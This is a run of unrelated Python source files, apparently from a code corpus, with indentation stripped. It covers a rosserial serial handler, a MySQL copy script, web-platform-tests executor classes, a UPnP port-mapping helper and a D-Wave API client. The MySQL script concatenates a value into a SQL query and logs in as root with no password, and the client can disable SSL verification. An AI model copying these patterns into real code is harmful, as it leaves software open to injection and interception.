rospy.loginfo("chk is %d" % ord(msg_len_chk))
continue
# topic id (2 bytes)
topic_id_header = self.tryRead(2)
topic_id, = struct.unpack("<h", topic_id_header)
try:
msg = self.tryRead(msg_length)
except IOError:
self.sendDiagnostics(diagnostic_msgs.msg.DiagnosticStatus.ERROR, "Packet Failed : Failed to read msg data")
rospy.loginfo("Packet Failed : Failed to read msg data")
rospy.loginfo("msg len is %d",len(msg))
raise
# checksum for topic id and msg
chk = self.tryRead(1)
checksum = sum(map(ord, topic_id_header) ) + sum(map(ord, msg)) + ord(chk)
if checksum % 256 == 255:
self.synced = True
try:
self.callbacks[topic_id](msg)
except KeyError:
rospy.logerr("Tried to publish before configured, topic id %d" % topic_id)
rospy.sleep(0.001)
else:
rospy.loginfo("wrong checksum for topic id and msg")
except IOError:
# One of the read calls had an issue. Just to be safe, request that the client
# reinitialize their topics.
self.requestTopics()
def setPublishSize(self, bytes):
if self.buffer_out < 0:
self.buffer_out = bytes
rospy.loginfo("Note: publish buffer size is %d bytes" % self.buffer_out)
def setSubscribeSize(self, bytes):
if self.buffer_in < 0:
self.buffer_in = bytes
rospy.loginfo("Note: subscribe buffer size is %d bytes" % self.buffer_in)
def setupPublisher(self, data):
""" Register a new publisher. """
try:
msg = TopicInfo()
msg.deserialize(data)
pub = Publisher(msg)
self.publishers[msg.topic_id] = pub
self.callbacks[msg.topic_id] = pub.handlePacket
self.setPublishSize(msg.buffer_size)
rospy.loginfo("Setup publisher on %s [%s]" % (msg.topic_name, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of publisher failed: %s", e)
def setupSubscriber(self, data):
""" Register a new subscriber. """
try:
msg = TopicInfo()
msg.deserialize(data)
if not msg.topic_name in self.subscribers.keys():
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Setup subscriber on %s [%s]" % (msg.topic_name, msg.message_type) )
elif msg.message_type != self.subscribers[msg.topic_name].message._type:
old_message_type = self.subscribers[msg.topic_name].message._type
self.subscribers[msg.topic_name].unregister()
sub = Subscriber(msg, self)
self.subscribers[msg.topic_name] = sub
self.setSubscribeSize(msg.buffer_size)
rospy.loginfo("Change the message type of subscriber on %s from [%s] to [%s]" % (msg.topic_name, old_message_type, msg.message_type) )
except Exception as e:
rospy.logerr("Creation of subscriber failed: %s", e)
def setupServiceServerPublisher(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceServerSubscriber(self, data):
""" Register a new service server. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceServer(msg, self)
rospy.loginfo("Setup service server on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service server failed: %s", e)
def setupServiceClientPublisher(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setPublishSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mreq._md5sum == msg.md5sum:
self.callbacks[msg.topic_id] = srv.handlePacket
else:
raise Exception('Checksum does not match: ' + srv.mreq._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def setupServiceClientSubscriber(self, data):
""" Register a new service client. """
try:
msg = TopicInfo()
msg.deserialize(data)
self.setSubscribeSize(msg.buffer_size)
try:
srv = self.services[msg.topic_name]
except:
srv = ServiceClient(msg, self)
rospy.loginfo("Setup service client on %s [%s]" % (msg.topic_name, msg.message_type) )
self.services[msg.topic_name] = srv
if srv.mres._md5sum == msg.md5sum:
srv.id = msg.topic_id
else:
raise Exception('Checksum does not match: ' + srv.mres._md5sum + ',' + msg.md5sum)
except Exception as e:
rospy.logerr("Creation of service client failed: %s", e)
def handleTimeRequest(self, data):
""" Respond to device with system time. """
t = Time()
t.data = rospy.Time.now()
data_buffer = StringIO.StringIO()
t.serialize(data_buffer)
self.send( TopicInfo.ID_TIME, data_buffer.getvalue() )
self.lastsync = rospy.Time.now()
def handleParameterRequest(self, data):
""" Send parameters to device. Supports only simple datatypes and arrays of such. """
req = RequestParamRequest()
req.deserialize(data)
resp = RequestParamResponse()
try:
param = rospy.get_param(req.name)
except KeyError:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if param == None:
rospy.logerr("Parameter %s does not exist"%req.name)
return
if (type(param) == dict):
rospy.logerr("Cannot send param %s because it is a dictionary"%req.name)
return
if (type(param) != list):
param = [param]
# check that all parameters in the list are of the same type
t = type(param[0])
for p in param:
if t!= type(p):
rospy.logerr('All parameters in the list %s must be of the same type'%req.name)
return
if (t == int):
resp.ints= param
if (t == float):
resp.floats=param
if (t == str):
resp.strings = param
data_buffer = StringIO.StringIO()
resp.serialize(data_buffer)
self.send(TopicInfo.ID_PARAMETER_REQUEST, data_buffer.getvalue())
def handleLoggingRequest(self, data):
""" Forward logging information from serial device into ROS. """
msg = Log()
msg.deserialize(data)
if (msg.level == Log.ROSDEBUG):
rospy.logdebug(msg.msg)
elif(msg.level== Log.INFO):
rospy.loginfo(msg.msg)
elif(msg.level== Log.WARN):
rospy.logwarn(msg.msg)
elif(msg.level== Log.ERROR):
rospy.logerr(msg.msg)
elif(msg.level==Log.FATAL):
rospy.logfatal(msg.msg)
def send(self, topic, msg):
""" Send a message on a particular topic to the device. """
with self.mutex:
length = len(msg)
if self.buffer_in > 0 and length > self.buffer_in:
rospy.logerr("Message from ROS network dropped: message larger than buffer.")
print msg
return -1
else:
#modified frame : header(2 bytes) + msg_len(2 bytes) + msg_len_chk(1 byte) + topic_id(2 bytes) + msg(x bytes) + msg_topic_id_chk(1 byte)
# second byte of header is protocol version
msg_len_checksum = 255 - ( ((length&255) + (length>>8))%256 )
msg_checksum = 255 - ( ((topic&255) + (topic>>8) + sum([ord(x) for x in msg]))%256 )
data = "\xff" + self.protocol_ver + chr(length&255) + chr(length>>8) + chr(msg_len_checksum) + chr(topic&255) + chr(topic>>8)
data = data + msg + chr(msg_checksum)
self.port.write(data)
return length
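# Worked example of the frame layout described above (illustrative values):
# for a 300-byte message on topic id 125, length = 300 = 0x012c, so
#   msg_len_checksum = 255 - ((0x2c + 0x01) % 256) = 210
#   msg_checksum     = 255 - ((125 + 0 + sum of payload bytes) % 256)
# giving the frame 0xff, protocol_ver, 0x2c, 0x01, 0xd2, 0x7d, 0x00,
# payload bytes, msg_checksum.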
def sendDiagnostics(self, level, msg_text):
msg = diagnostic_msgs.msg.DiagnosticArray()
status = diagnostic_msgs.msg.DiagnosticStatus()
status.name = "rosserial_python"
msg.header.stamp = rospy.Time.now()
msg.status.append(status)
status.message = msg_text
status.level = level
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[0].key="last sync"
if self.lastsync.to_sec()>0:
status.values[0].value=time.ctime(self.lastsync.to_sec())
else:
status.values[0].value="never"
status.values.append(diagnostic_msgs.msg.KeyValue())
status.values[1].key="last sync lost"
status.values[1].value=time.ctime(self.lastsync_lost.to_sec())
self.pub_diagnostics.publish(msg)
|
episode.py
|
import time
import pymysql
import multiprocessing
from pymysql.cursors import DictCursor
from multiprocessing import Process, Pool
db1 = pymysql.connect("localhost", "root", "", "bidscore")
db2 = pymysql.connect("localhost", "root", "", "miraihyoka")
cursor_b = db1.cursor(DictCursor)
cursor_m = db2.cursor(DictCursor)
def getbangumiid(animate_id, bangumi_id, m):
sql2 = "select * from bidscore.episode where id=" + bangumi_id
cursor_b.execute(sql2)
items_b = cursor_b.fetchall()
for item_b in items_b:
no = item_b["no"]
title=item_b["title"]
sql1 = "insert into miraihyoka.episode(animate_id, name,no) value (%s,%s,%s)"
args = (animate_id, title,no)
cursor_m.execute(sql1, args)
db2.commit()
print("-----------------已插入" + str(m) + "条-----------------")
if __name__ == '__main__':
sql1 = "select * from animate"
db2.ping(reconnect=True)
cursor_m.execute(sql1)
items_m = cursor_m.fetchall()
nnn = 0
aa=Pool(30)
for item_m in items_m:
an = item_m["animate_id"]
bid = item_m["bangumi_idid"]
if bid is not None:
nnn += 1
aa.apply(getbangumiid, args=(an, bid, nnn))
# p = Process(target=getbangumiid, args=(an, bid, nnn))
# p.start()
aa.close()
aa.join()
|
base.py
|
import hashlib
import httplib
import os
import threading
import traceback
import socket
import urlparse
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def executor_kwargs(test_type, server_config, cache_manager, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlparse.urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlparse.urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN"}
def __call__(self, test, result):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def reftest_result_converter(self, test, result):
return (test.result_cls(result["status"], result["message"],
extra=result.get("extra")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TestExecutor(object):
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
self.logger.warning(traceback.format_exc(e))
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urlparse.urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hashlib.sha1(screenshot).hexdigest()
self.screenshot_cache[key] = (hash_value, None)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def is_pass(self, lhs_hash, rhs_hash, relation):
assert relation in ("==", "!=")
self.message.append("Testing %s %s %s" % (lhs_hash, relation, rhs_hash))
return ((relation == "==" and lhs_hash == rhs_hash) or
(relation == "!=" and lhs_hash != rhs_hash))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes[0], hashes[1], relation):
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [{"url": nodes[0].url, "screenshot": screenshots[0]}, relation,
{"url": nodes[1].url, "screenshot": screenshots[1]}]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message", "")
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def execute_script(self, script, async=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WebDriverProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = httplib.HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are substantially different from WebDriver may need a
fully custom implementation."""
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {
"click": ClickAction(self.logger, self.protocol),
"send_keys": SendKeysAction(self.logger, self.protocol)
}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [url] + payload
return True, rv
def process_action(self, url, payload):
parent = self.protocol.base.current_window
try:
self.protocol.base.set_window(self.test_window)
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
action_handler(payload)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "failure")
else:
self.logger.debug("Action %s completed" % action)
self._send_message("complete", "success")
finally:
self.protocol.base.set_window(parent)
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
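# Illustrative sketch of how a testdriver callback flows through
# CallbackHandler (the URL, selector, and variable names are assumptions):
#
#   handler = CallbackHandler(logger, protocol, test_window)
#   done, rv = handler((url, "action", {"action": "click", "selector": "#go"}))
#   # dispatches to ClickAction, reports back via protocol.testdriver, and
#   # returns (False, None) so the harness keeps waiting for a "complete".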
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(elements[0])
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(elements[0], keys)
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "littlelambocoin", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run littlelambocoin, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
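# Minimal usage sketch (assumes miniupnpc is importable and a UPnP-capable
# gateway is reachable; the port number is an arbitrary example):
#
#   upnp = UPnP()
#   upnp.remap(8444)     # queue a request to forward TCP 8444 to this host
#   upnp.release(8444)   # queue removal of the mapping
#   upnp.shutdown()      # stop the worker thread and join it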
|
client.py
|
from __future__ import division, absolute_import
import threading
import time
import sys
import posixpath
import logging
import requests
import collections
import datetime
from itertools import chain
from six.moves import queue, range
from dwave.cloud.exceptions import *
from dwave.cloud.config import load_config, legacy_load_config
from dwave.cloud.solver import Solver
_LOGGER = logging.getLogger(__name__)
# _LOGGER.setLevel(logging.DEBUG)
# _LOGGER.addHandler(logging.StreamHandler(sys.stdout))
class Client(object):
"""
Base client for all D-Wave API clients.
Implements workers (and handles thread pools) for problem submittal, task
cancellation, problem status polling and results downloading.
Args:
endpoint (str):
D-Wave API endpoint URL.
token (str):
Authentication token for the D-Wave API.
solver (str):
Default solver.
proxy (str):
Proxy URL to be used for accessing the D-Wave API.
permissive_ssl (bool, default=False):
Disables SSL verification.
"""
# The status flags that a problem can have
STATUS_IN_PROGRESS = 'IN_PROGRESS'
STATUS_PENDING = 'PENDING'
STATUS_COMPLETE = 'COMPLETED'
STATUS_FAILED = 'FAILED'
STATUS_CANCELLED = 'CANCELLED'
# Cases when multiple status flags qualify
ANY_STATUS_ONGOING = [STATUS_IN_PROGRESS, STATUS_PENDING]
ANY_STATUS_NO_RESULT = [STATUS_FAILED, STATUS_CANCELLED]
# Number of problems to include in a status query
_STATUS_QUERY_SIZE = 100
# Number of worker threads for each problem processing task
_SUBMISSION_THREAD_COUNT = 5
_CANCEL_THREAD_COUNT = 1
_POLL_THREAD_COUNT = 2
_LOAD_THREAD_COUNT = 5
@classmethod
def from_config(cls, config_file=None, profile=None, client=None,
endpoint=None, token=None, solver=None, proxy=None,
**kwargs):
"""Client factory method which loads configuration from file(s),
process environment variables and explicitly provided values, creating
and returning the appropriate client instance
(:class:`dwave.cloud.qpu.Client` or :class:`dwave.cloud.sw.Client`).
Example:
Create ``dwave.conf`` in your current directory or
``~/.config/dwave/dwave.conf``::
[prod]
endpoint = https://cloud.dwavesys.com/sapi
token = DW-123123-secret
solver = DW_2000Q_1
Run::
from dwave.cloud import Client
client = Client.from_config(profile='prod')
solver = client.get_solver()
computation = solver.sample_ising({}, {})
samples = computation.result()
TODO: describe config loading, new config in broad strokes, refer to
actual loaders' doc; include examples for config and usage.
TODO: mention kwargs include `permissive_ssl`, but are not limited to
that.
"""
# try loading configuration from a preferred new config subsystem
# (`./dwave.conf`, `~/.config/dwave/dwave.conf`, etc)
try:
config = load_config(
config_file=config_file, profile=profile, client=client,
endpoint=endpoint, token=token, solver=solver, proxy=proxy)
except ValueError:
config = dict(
endpoint=endpoint, token=token, solver=solver, proxy=proxy,
client=client)
# and fall back to the legacy `.dwrc`
if config.get('token') is None or config.get('endpoint') is None:
try:
_endpoint, _token, _proxy, _solver = legacy_load_config(
key=profile,
endpoint=endpoint, token=token, solver=solver, proxy=proxy)
config = dict(
endpoint=_endpoint, token=_token, solver=_solver, proxy=_proxy,
client=client)
except (ValueError, IOError):
pass
# manual override of other (client-custom) arguments
for var, val in kwargs.items():
config[var] = val
from dwave.cloud import qpu, sw
_clients = {'qpu': qpu.Client, 'sw': sw.Client}
_client = config.pop('client', None) or 'qpu'
return _clients[_client](**config)
def __init__(self, endpoint=None, token=None, solver=None, proxy=None,
permissive_ssl=False, **kwargs):
"""To setup the connection a pipeline of queues/workers is constructed.
There are five interations with the server the connection manages:
1. Downloading solver information.
2. Submitting problem data.
3. Polling problem status.
4. Downloading problem results.
5. Canceling problems
Loading solver information is done synchronously. The other four tasks
are performed by asynchronously workers. For 2, 3, and 5 the workers
gather tasks in batches.
"""
if not endpoint or not token:
raise ValueError("Endpoint URL and/or token not defined")
_LOGGER.debug("Creating a client for endpoint: %r", endpoint)
self.endpoint = endpoint
self.token = token
self.default_solver = solver
# Create a :mod:`requests` session. `requests` will manage our url parsing, https, etc.
self.session = requests.Session()
self.session.headers.update({'X-Auth-Token': self.token})
self.session.proxies = {'http': proxy, 'https': proxy}
if permissive_ssl:
self.session.verify = False
# Build the problem submission queue, start its workers
self._submission_queue = queue.Queue()
self._submission_workers = []
for _ in range(self._SUBMISSION_THREAD_COUNT):
worker = threading.Thread(target=self._do_submit_problems)
worker.daemon = True
worker.start()
self._submission_workers.append(worker)
# Build the cancel problem queue, start its workers
self._cancel_queue = queue.Queue()
self._cancel_workers = []
for _ in range(self._CANCEL_THREAD_COUNT):
worker = threading.Thread(target=self._do_cancel_problems)
worker.daemon = True
worker.start()
self._cancel_workers.append(worker)
# Build the problem status polling queue, start its workers
self._poll_queue = queue.Queue()
self._poll_workers = []
for _ in range(self._POLL_THREAD_COUNT):
worker = threading.Thread(target=self._do_poll_problems)
worker.daemon = True
worker.start()
self._poll_workers.append(worker)
# Build the result loading queue, start its workers
self._load_queue = queue.Queue()
self._load_workers = []
for _ in range(self._LOAD_THREAD_COUNT):
worker = threading.Thread(target=self._do_load_results)
worker.daemon = True
worker.start()
self._load_workers.append(worker)
# Prepare an empty set of solvers
self._solvers = {}
self._solvers_lock = threading.RLock()
self._all_solvers_ready = False
# Set the parameters for requests; disable SSL verification if needed
self._request_parameters = {}
if permissive_ssl:
self._request_parameters['verify'] = False
def close(self):
"""Perform a clean shutdown.
Wait for all the currently scheduled work to finish, kill the workers,
and close the connection pool. Assumes no one is submitting more work
while the connection is closing.
"""
# Finish all the work that requires the connection
_LOGGER.debug("Joining submission queue")
self._submission_queue.join()
_LOGGER.debug("Joining cancel queue")
self._cancel_queue.join()
_LOGGER.debug("Joining poll queue")
self._poll_queue.join()
_LOGGER.debug("Joining load queue")
self._load_queue.join()
# Send kill-task to all worker threads
# Note: threads can't be 'killed' in Python, they have to die by
# natural causes
for _ in self._submission_workers:
self._submission_queue.put(None)
for _ in self._cancel_workers:
self._cancel_queue.put(None)
for _ in self._poll_workers:
self._poll_queue.put(None)
for _ in self._load_workers:
self._load_queue.put(None)
# Wait for threads to die
for worker in chain(self._submission_workers, self._cancel_workers,
self._poll_workers, self._load_workers):
worker.join()
# Close the requests session
self.session.close()
def __enter__(self):
"""Let connections be used in with blocks."""
return self
def __exit__(self, *args):
"""At the end of a with block perform a clean shutdown of the connection."""
self.close()
return False
@staticmethod
def is_solver_handled(solver):
"""Predicate function that determines if the given solver should be
handled by this client.
Can be overridden in a subclass to specialize the client for a
particular type of solver.
Default implementation accepts all solvers.
